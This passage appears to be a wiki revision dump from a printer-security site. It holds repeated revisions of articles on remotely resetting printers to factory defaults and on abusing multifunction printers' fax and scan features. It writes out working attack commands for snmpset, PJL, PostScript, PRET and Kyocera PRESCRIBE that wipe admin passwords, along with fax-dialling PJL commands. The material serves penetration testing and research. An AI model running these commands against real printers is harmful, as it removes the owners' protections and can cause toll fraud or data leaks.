MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Any anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: <syntaxhighlight lang=postscript> << /FactoryDefaults true >> setsystemparams </syntaxhighlight> Restart the PostScript interpreter and virtual memory: <syntaxhighlight lang=postscript> true 0 startjob systemdict /quit get exec </syntaxhighlight> '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using netcat, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 763ac6226cd8a56e6f2a5fbb4bf82e533cbfc5ac 115 114 2017-01-14T18:01:26Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. They have, as discussed in this article. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Any anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset PostScript system parameters to factory defaults: << /FactoryDefaults true >> setsystemparams Restart the PostScript interpreter and virtual memory: true 0 startjob systemdict /quit get exec '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using netcat, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- 58a0f6f12c669e591cd0f4d61bdf5d6d95c6a0fb 114 104 2017-01-14T17:52:53Z Admin 1 wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. '''How to test for this attack?''' Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 '''Who can perform this attack?''' Any anyone who can send network packets to port 161/udp of the printer device. == PML/PJL == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows an attacker to restart and/or reset the device to factory defaults within ordinary print jobs as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" '''How to test for this attack?''' On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset device to factory defaults (PostScript) << /FactoryDefaults true >> setsystemparams Restart the PostScript interpreter and VM: true 0 startjob systemdict /quit get exec '''How to test for this attack?''' Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; '''How to test for this attack?''' Open a raw network connection (using netcat, for example) to port 9100/tcp of the printer and send the commands above. '''Who can perform this attack?''' Any anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. ---- <!-- % Resetting a printer device to factory defaults to bypass protection mechanisms as proposed in \autoref{sub:factory-defaults} is trivial for a physical/local attacker (AM1). All tested printers (see \autoref{tab:test-printers}) have documented procedures to perform a cold reset by pressing certain key combinations or setting a jumper. For network attackers (AM2) and web attackers (AM3), things are more complicated as discussed below.\\ % PML and PostScript based attacks can be performed in AM1, AM2 and AM3 because they are deployed over the printing channel while SNMP is available solely in AM2. % performing the reset procedure. % Resetting a device to factory defaults and therefore bypassing protection mechanisms can be performed by a local attacker for all models in the test printer pool, by web attacker for models supporting PML, PostScript or PRESCRIBE and additionally for SNMP by a network attacker a --> 2a743efad252dc8c85cf7b64122de81440fc9d14 104 2017-01-11T10:12:17Z 78.48.214.196 0 Created page with "Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressin..." wikitext text/x-wiki Resetting a device to factory defaults is a security-critical functionality as it overwrites protection mechanisms like user-set passwords. This can usually be done by pressing a special key combination on the printer's control panel. Performing such a cold reset only takes seconds and therefore is a realistic scenario for local attackers or penetration testers, who can for example sneak into the copy room at lunchtime. However, physical access to the device is not always an option. The question comes up, if printer vendors have implemented the possibility to perform factory resets on-line using printer control or page description languages. == SNMP == The Printer-MIB <ref>''[https://www.ietf.org/rfc/rfc3805.txt RFC3805: Printer MIB v2]'', R. Bergman, I. McDonald and H. Lewis, 2004</ref> defines the ''prtGeneralReset'' Object (OID 1.3.6.1.2.1.43.5.1.1.3.1) which allows an attacker to restart the device (''powerCycleReset(4)''), reset the NVRAM settings (''resetToNVRAM(5)'') or restore factory defaults (''resetToFactoryDefaults(6)'') using [[SNMP]]. Resetting the device to factory default can be accomplished using ''snmpset'' command as shown below: $ snmpset -v1 -c public printer 1.3.6.1.2.1.43.5.1.1.3.1 i 6 This feature/attack is supported by a large variety of printers and removes all protection mechanisms like user-set passwords for the embedded web server. While protection mechanisms can be efficiently bypassed, a practical drawback of this approach is that all static IP address configuration will be lost. If no [[DHCP]] service is available, the attacker will not be able to reconnect to the device anymore after resetting it to factory defaults. == PML == In many scenarios an attacker does not have the capabilities to perform SNMP requests because of firewalls or unknown SNMP community strings. On HP devices however, SNMP can be transformed into its [[PML]] representation and embed the request within a legitimate print job. This allows to restart and/or reset the device to factory defaults as shown below: @PJL DMCMD ASCIIHEX="040006020501010301040106" === How to test this attack? === On HP printers, restarting or resetting the device can easily be reproduced using [[PRET]]: ./pret.py -q printer pjl Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart == PostScript == PostScript offers a similar feature: The ''FactoryDefaults'' system parameter, ‘a flag that, if set to true immediately before the printer is turned off, causes all nonvolatile parameters to revert to their factory default values at the next power-on’ <ref>''[https://www.adobe.com/products/postscript/pdfs/PLRM.pdf PostScript Language Reference Manual, 3rd Edition]'', Adobe Systems Inc., 1999, p. 751</ref>. Restarting the printer on the other hand can be accomplished by SNMP and PML as described above. It must be noted that PostScript itself also has the capability to restart its environment but it requires a [[Credential disclosure|valid password]]. The PostScript interpreter however can be put into an infinite loop as discussed in [[eval-transmission-channel]] which forces the user to manually restart the device and thus reset the PostScript password. Reset device to factory defaults (PostScript) << /FactoryDefaults true >> setsystemparams Restart the PostScript interpreter and VM: true 0 startjob systemdict /quit get exec === How to test this attack? === Restarting or resetting a printer's PostScript interpreter can easily be reproduced using [[PRET]]: ./pret.py -q printer ps Connection to printer established Welcome to the pret shell. Type help or ? to list commands. printer:/> reset printer:/> restart == PRESCRIBE == For Kyocera devices, the PRESCRIBE page description languages may be used to reset the device to factory default from within ordinary print jobs using one of the commands shown below: <!-- may autorize first, using default machine passwords: !R! ACNT "ADMN", "5200"; --> !R! KSUS "AUIO", "CUSTOM:Admin Password = 'admin00'"; CMMT "Drop the security level, reset password"; !R! ACNT "REST"; CMMT "Reset account code admin password"; !R! EGRE; CMMT "Reset the engine board to factory defaults"; !R! SIOP0,"RESET:0"; CMMT "Reset configuration settings"; ---- <!-- % Resetting a printer device to factory defaults to bypass protection mechanisms as proposed in \autoref{sub:factory-defaults} is trivial for a physical/local attacker (AM1). All tested printers (see \autoref{tab:test-printers}) have documented procedures to perform a cold reset by pressing certain key combinations or setting a jumper. For network attackers (AM2) and web attackers (AM3), things are more complicated as discussed below.\\ % PML and PostScript based attacks can be performed in AM1, AM2 and AM3 because they are deployed over the printing channel while SNMP is available solely in AM2. % performing the reset procedure. % Resetting a device to factory defaults and therefore bypassing protection mechanisms can be performed by a local attacker for all models in the test printer pool, by web attacker for models supporting PML, PostScript or PRESCRIBE and additionally for SNMP by a network attacker a --> aa7a3b3d7ae43d29bd0a31d229883da7fb127f5c 0 13 119 118 2017-01-14T18:30:12Z Admin 1 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. Access to such functionality is interesting for an attack because it means more sources to gain sensitive information and extended capabilities like access to phone lines. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like [https://en.wikipedia.org/wiki/TIFF#TIFF_Compression_Tag TIFF]. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Vendor-specific examples to send fax via PDL datastreams are given below. === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the fax function. '''Who can perform this attack?''' Potentially anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator ''_brpdfscan'' may possibly be used. '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the scan function. '''Who can perform this attack?''' * Anyone who can print, if scanning functionality can be accessed through a [[Fundamentals#Printer_Control_Languages|printer control]] or [[Fundamentals#Page_Description_Languages|page description]] language * Anyone who can access the web interface, on MFPs where documents can be scanned using the web interface * Only attackers who can access certain network services, if a separate TCP port is used for scanning ---- 3e223a78f856ae60c512143157d112d40f4e4fd5 118 117 2017-01-14T18:21:46Z Admin 1 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. Access to such functionality is interesting for an attack because it means more sources to gain sensitive information and extended capabilities like access to phone lines. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the fax function. '''Who can perform this attack?''' Potentially anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator ''_brpdfscan'' may possibly be used. '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the scan function. '''Who can perform this attack?''' * Anyone who can print, if scanning functionality can be accessed through a [[Fundamentals#Printer_Control_Languages|printer control]] or [[Fundamentals#Page_Description_Languages|page description]] language * Anyone who can access the web interface, on MFPs where documents can be scanned using the web interface * Only attackers who can access certain network services, if a separate TCP port is used for scanning ---- a70cb33dd9d318543932e3e97afec3fdfefe6d2a 117 116 2017-01-14T18:21:08Z Admin 1 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. Access to such functionality is interesting for an attack because it means more sources to gain potentially sensitive information and extended capabilities like access to phone lines. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the fax function. '''Who can perform this attack?''' Potentially anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator ''_brpdfscan'' may possibly be used. '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the scan function. '''Who can perform this attack?''' * Anyone who can print, if scanning functionality can be accessed through a [[Fundamentals#Printer_Control_Languages|printer control]] or [[Fundamentals#Page_Description_Languages|page description]] language * Anyone who can access the web interface, on MFPs where documents can be scanned using the web interface * Only attackers who can access certain network services, if a separate TCP port is used for scanning ---- 4ee0a99032a6c0355556c8c6b10b118c00555bc6 116 50 2017-01-14T18:20:41Z Admin 1 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. Access to such functionality is interesting for an attack because it means more sources to gain potentially sensitive information and extended capabilities like access to phone lines. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on printers or MFPs in internal networks. In the middle of 90s Adobe introduced ‘PostScript fax’ as a language supplement <ref>''[http://ftp.ktug.org/obsolete/info/adobe/devtechnotes/pdffiles/ps2016.supplement.pdf PostScript Language Reference Manual Supplement for Version 2016]'', Adobe Systems Inc., 1995, p. 18-35</ref>, allowing compatible devices to receive PostScript files directly via fax. This enables an attacker to use ordinary telephone system as a channel to deploy malicious PostScript code to a printer. Unfortunately, PostScript fax never established itself and was only implemented in a handful of devices. Telefax messages instead are typically transmitted as graphical images like TIFF. Nevertheless, it cannot be ruled out that other vendors implement proprietary fax extensions to '''inbound''' receive arbitrary PDL datastreams instead of raw fax images. Theoretically, a ‘fax virus’ could be created which would spread by infecting other devices based on numbers from the MFPs's address book or by traditional wardialing. Furthermore, '''outbound''' fax can often be controlled by proprietary PJL commands on today's MFPs. This can be used to cause financial loss to an institution by calling an 0900 number (which may be registered by the attacker herself) or as a backchannel to leak sensitive information. Examples are given below (mostly untested). === HP === According to [http://hplipopensource.com] fax can be accessed using PML on HP devices. === Xerox === According to [http://www.office.xerox.com/support/dctips/dc02cc0280.pdf], Xerox uses proprietary PJL commands: <code>@PJL COMMENT OID_ATT_FAX_DESTINATION_PHONE "..."</code> === Brother === According to [http://brother-mfc.sourceforge.net/faxlanguage.txt], Brother uses the proprietary FCL (Fax Control Language): <code><Esc>DIALNUM[ (...) ]</code> === Lexmark === According to [https://www.lexmark.com/publications/pdfs/techref_WB.pdf] Lexmark uses proprietary PJL commands: <code>@PJL LFAX PHONENUMBER="..."</code> === Kyocera === According to [http://material.karlov.mff.cuni.cz/people/hajek/bizhub/femperonpsc200mu.pl] Kyocera uses proprietary PJL commands: <code>@PJL SET FAXTEL = ...</code> === Ricoh === Accroding to [http://www.objectiflune.com/forum2/ubbthreads.php?ubb=showflat&Number=29462&page=1] Ricoh uses proprietary PJL commands: <code>@PJL ENTER LANGUAGE=RFAX</code> '''Who can perform this attack?''' '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the fax function. '''Who can perform this attack?''' Potentially anyone who can print, for example through [[USB drive or cable]], [[Port 9100 printing]] or [[Cross-site printing]]. == Scanner == Access to scan functionality on MFPs is not standardized and it seems only few vendors apply PJL commands for this task. Public documentation is missing, the [http://www.sane-project.org/sane-backends.html#SCANNERS SANE project] managed to reverse engineer the protocols for various scanner devices. On Brother MFPs, the proprietary PostScript operator ''_brpdfscan'' may possibly be used. '''How to test for this attack?''' Install the printer drivers for the specific model and (ab)use the scan function. '''Who can perform this attack?''' * Anyone who can print, if scanning functionality can be accessed through a [[Fundamentals#Printer_Control_Languages|printer control]] or [[Fundamentals#Page_Description_Languages|page description]] language * Anyone who can access the web interface, on MFPs where documents can be scanned using the web interface * Only attackers who can access certain network services, if a separate TCP port is used for scanning ---- b1f1c21b28d01f2985b3074cdbf2f700db4fc6ef 50 43 2017-01-05T15:08:20Z 134.147.128.156 0 wikitext text/x-wiki While single function printers are still common there is clearly a trend towards multi-function printers/peripherals (MFP), also referred to as multi-function devices (MFD) or all-in-one (AiO) devices, which have additional built-in functions like scanning and/or telefax. == Telefax == Fax messages are transmitted in the form of audio-frequency tones. They can be sent to any telefax-capable device available over the telephone system. Therefore, they could potentially be used to bypass typical company protection mechanisms like TCP/IP firewalls or intrusion detection systems and execute malicious commands on 